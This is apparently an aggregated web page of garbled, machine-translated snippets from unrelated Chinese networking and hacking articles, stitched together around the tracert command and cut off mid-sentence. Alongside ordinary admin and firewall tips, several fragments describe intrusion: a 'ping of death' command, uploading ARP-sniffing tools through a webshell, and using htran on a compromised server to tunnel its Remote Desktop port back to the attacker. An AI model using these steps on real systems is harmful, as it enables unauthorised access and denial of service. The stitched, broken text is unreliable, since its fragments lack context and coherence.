host's operating system, but when the user modifies the TTL value, it will mislead our judgment, so this method of judgment is not necessarily accurate. The following are the default operating system ttl:1, Windows nt/2000 ttl:128 2, Windows 95/98 ttl:32 3, UNIX ttl:255 4, LINUX TTL: 64 5, WIN7 ttl:64 Three, how to confirm the number of routes determined from the TTL value
From the TTL value, we can roughly determine how many routers the host's packet passes through to the destination host, so
-11 times.
Iptables-t mangle-a prerouting-i eth0-j TTL--ttl-inc 1
# When leaving the firewall does not increase or decrease, tracert is not good use, hehe.
(8) Owner match
Match the package based on the ID of the package's creator (that is, the owner or the owning person).
Owner can be the ID of the user who started the process, or the ID of the user's level or the ID of the process, or the ID of the session. This can only be used in output.
This modu
recently logged in (03)-Note: parameter-A to capitalize
TrAcert-Parameter IP (or computer name) trace route (packet), Parameter: "-W number" is used to set the time-out interval.
Ping IP (or domain name) sends the default size of 32 bytes of data to the host, parameter: "-l[space" packet size ";"-N Send data Number ";"-T "means to ping all the time.
PING-T-l 65550 ip death ping (send files larger than 64K and Ping is the ping of death)
Ipconfig (wini
the pcanywhere password. :), tracert:
1
Alas, arp spoofing can be performed when the anti-DDOS service is in this situation. (For more information about arp spoofing, bbs.666379cn/dispbbs.asp? BoardID = 7 ID = 764 page = 1)
Use webshell to upload the required software:
WinPcap.exe arpsniffer.exe pv.exe
Arpsniffer.exe ------------ 57 k Rongge's sniffing tool in the exchange environment
Pv.exe ---------------- 60 k (a command line program attached t
successfully completed.
10. Route Tracking command A. tracert pop.pcpop.comB. In addition to displaying routes, pathping pop.pcpop.com also provides S analysis to calculate the % of the dropped packets.
11. Several commands on shared security A. view the shared resources of your machine. net shareB. manually delete the share (you can compile a bat file, start the instance and run it, and delete all the shares !)Net share c $/dNet share d $/dNet s
-shelling Application
Buffer overflow-Principle
Denial of Service Attack-Principles of SYN attacks, smurf attacks, pingflood, Teardrop, and LAND attacks
Malicious Code-principles and features of Trojans, viruses, worms, and malicious code on webpages
SQL Injection-Application
Principles of network spoofing-IP Address Spoofing
Log cleanup-Windows, linux
Operating system vulnerabilities-Windows and linux
Operating system security policy configuration-Windows and linux
Network device attack and Sec
in the same LAN. Usage: tracert IP.V. netThis command is the most important one in network commands. You must thoroughly understand the usage of each of its sub-commands, because it is too powerful, this is the best intrusion tool that Microsoft provides for us. First, let's take a look at all the sub-commands it has, and type net /? Press enter 6.Here, we will focus on several common subcommands for intrusion.Net viewUse this command to view shared
name of ICMP is Internet Control and Message Protocal, that is, Internet Control Message/error Message protocol. This protocol is mainly used to transmit error information and Control information, for example, the well-known Ping and Tracert tools use the ECHO request packet in ICMP protocol (the icmp echo type 8 code 0 and the icmp echoreply Type 0 code 0 ).
The ICMP protocol has a characteristic that it is connectionless. That is to say, as long as
by the default gateway instead of the VPN.
It is easy to verify. You only need to use tracert or pathping an Internet IP address. The specific process is not described in detail.
In short, there are both advantages and disadvantages, and tunnel separation is no exception. It enhances the network experience of remote users, reduces the load on VPN gateways, but reduces the network security of remote PCs. Hackers can access the VPN tunnel directly to t
logging on to the user, go to the User View:Ii. Unified User View 1. Configuration level: Business configuration commands, including routing and network-level commands, which are used to provide users with direct network services. 2. Visit level: USER commands (PING and TRACERT) of the network diagnostic tool, commands for accessing external devices from the current device, and other commands hidden. Commands of this level cannot be saved in the conf
comprehensive debugging.1. Activate the Ethernet port of the router and all the serial ports to be used. The method is to enter this port and execute no shutdown.2. Add the ethernet address of the default route center router to the host connected to the router ). Run "router add default XXXX 1XXXX" as the E0 port address of the router under the super user of the Unix system ). Add a default route to each host. Otherwise, communication will fail.3. ping the Ethernet port of the local router. If
generally not the default value, because each time the IP packet passes through a router, the TTL is reduced by one. When the packet is reduced to 0, the packet will die. This is also the principle of Tracert. In this example, it is "80" and the conversion to decimal is 128. I use WIN2000.
Continue with "06", which indicates the Protocol type Protocol of the transport layer ). Defined in RFC790, 6 indicates that the transport layer is TCP.
The 16bit
.
Run the following command:
"Netsh interface ip add address" Local Area Connection "10.0.0.2 255.0.0.0"
To add IP addresses.
It doesn't matter if you don't know the syntax!
At the prompt, enter? You can find the answer. Convenience and inconvenience?
In the past, Microsoft also had some things that people liked. Unfortunately, I know little about it!
Windows command line program
This part includes:
Use ipconfig/all to view configuration use ipconfig/renew to refresh configuration use
-burst 2-j ACCEPT# Restrict the web services connected to the local machine. A single IP Address can have no more than 10 concurrent connections, and more than 10 connections will be rejected.$ Ipt-a INPUT-I $ INTERNET-p tcp-dport 80-m connlimit-abve 10-j REJECT$ Ipt-a INPUT-I $ INTERNET-p tcp-dport 443-m connlimit-abve 10-j REJECT# Restrict web services connected to the local machine. Up to 15 new connections can be created for a single IP address within 60 seconds. If the connection is exceede
kernel space) that sends this packet. Even if the system does not strictly follow this line, the content of the identifier Field of the data transmitted over the network should be randomly distributed, A normal operating system network stack cannot send a large number of fixed fields such as 0x0100.4. the TTL value is evenly distributed between 74 and 95. According to common sense, the default TTL of most operating systems should be the integer power of 2 such as 32, 64, and 128. On the other h
Article Title: getting started with cainiao: six tips for Security Configuration in Linux. Linux is a technology channel of the IT lab in China. Includes basic categories such as desktop applications, Linux system management, kernel research, embedded systems, and open source.
1. Use a firewall to close unnecessary ports. If someone else fails to PING the server, the threat is naturally reduced by more than half.
Methods To prevent ping by others:
1) at the command prompt
Echo 1>/proc/sys/net/ip
listening. Then, Run "D: \ xxx \ sys.exe-Slave x. x 9999 127.0.0.1 3389" in webshell to map port 3389 of the server to port 9999 of my machine. After the command is successfully executed, you will see that the server is connected to the local port 9999 In the CMD window of the local htran running (Figure 10 ). Log on to the Remote Desktop of the server by connecting to local 8888.
Run tracert 202.112.144.3 on the Academic Affairs server (figure 11)
officers to make trouble. 2. Run the tracert command on any affected host and run the following command in the doscommand window: tracert61.135.179.148. If the default gateway is 10.8.6.1 and the first hop is 10.8.6.186 when an Internet address is tracked, 10.8.6.186 is the virus source. Principle: the infected host plays the "intermediary" role between the affected host and the gateway. All packets that should have arrived at the gateway are sent to
= see_code files = eagle. phpThe reason for this kind of pony was not successful. I also hope that you will go to the horse directly after watching the official website.
The webshell is obtained, and the system permissions are obtained due to the negligence of the management!
Looked at the subnet mask, and the same network segment as ipv5.com. Good man, it's a good operation! The gateway is determined. 129. ping and tracert cannot communicate with
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.